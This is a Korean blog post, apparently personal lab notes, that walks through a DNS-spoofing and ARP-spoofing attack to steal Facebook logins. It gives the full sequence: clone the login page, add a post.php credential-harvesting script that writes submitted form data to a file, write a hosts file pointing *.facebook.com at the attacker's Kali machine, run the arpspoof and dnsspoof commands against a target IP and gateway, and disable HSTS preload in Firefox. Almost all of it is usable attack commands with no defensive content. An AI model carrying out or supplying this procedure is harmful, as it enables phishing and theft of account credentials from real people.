네트워크 dns 스푸핑
dns 스푸핑에 대해서 시작하기
DNS 스푸핑은 공격자가 클라이언트와 DNS 서버 간 통신에 개입하여 실제 IP 주소가 아닌 가짜 IP 주소를 응답하여 DNS 서버를 속이는 공격이다.
DNS 스푸핑은 웹 스푸핑과 비슷한 의미로 이해되기도 한다.
IP 주소를 변조 또는 사용자가 의도하지 않은 주소로 접속하게 만드는 공격방법이다.
칼리
facebook 페이지 접속
save page as...
index.html 저장하기
위치는 other location >>>>/var/www/html
cd /var/www/html 들어가기
apt-get install leafpad
leafpad index.html
ctrl+f "method" 찾기
뒤에 method post가 되어있는거!
action 뒷부분을 전부지운다
action = ""
지운다
action="post.php"
action="post.php" method
new 누르고 노트패드 하나더만들어서 코디
-------------------------------------------post.phppppppp
<?php
$file="post.txt";
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
------------------------------------------------------
위에거를 파일에 넣어준다.!!!!!!!!!!!!!!!
<?php
$file="post.txt";
변수설정을 post.txt로 지정하고
file_put_contents($file, print_r($_POST, true), FILE_APPEND);
?>
post.txt로 들어온파일을 해당암호화 계정로그인 등은 적어주고
facebook.com페이지를 진짜 페이지로 넘어가게 새로고침해준다!
post.txt는 빈공백으로 하나만들어서저장 이거대신 touch post.txt
cd /var/www/html
chmod 777 post.txt 권한주기
이제 페이스북으로 유도하는 서버만들기
새로운터미널
cd Desktop
leafpad
|
192.168.80.132 |
|
*.facebook.com 칼리자기ip |
hosts.txt 바탕화면에 저장!
터미널창 4개하고 dnsspoofing,arp스푸핑하고 페이북에 접속하게만들고 아이디 비번 가져옴
1
arpspoof -i eth0 -t 192.168.80.131 192.168.80.2
타겟ip 게이트웨이
dnsspoof -i eth0 -f /root/Desktop/hosts.txt
host.txt
2
service apache2 start
service apache2 status
centos에선 캐쉬삭제하셈
centos
dnf install nscd
3.
systemctl restart nscd 이건윈도우 ipconfig /flushdns
fragrouter 꺼야됨!!
centos
firefox들어가서
아이디 비밀번호를 가져올수있다
안될시 파이어폭스 캐쉬삭제,
about : config 입력후
network.stricttransportsecurity.preloadlist
값을 false로 하면 동작한다
--------------dns 스푸핑이랑 Arp 스푸핑같이해야함
'공격기법 및 탐지' 카테고리의 다른 글
| tcp half open scan (0) | 2021.01.04 |
|---|---|
| tcp syn(full. open. connect) scan (0) | 2021.01.04 |
| 네트워크 - 중요이론 (0) | 2021.01.04 |
| 네트워크 해킹 dos기법 (0) | 2020.11.30 |
| 네트워크 arp 스푸핑 (0) | 2020.11.30 |
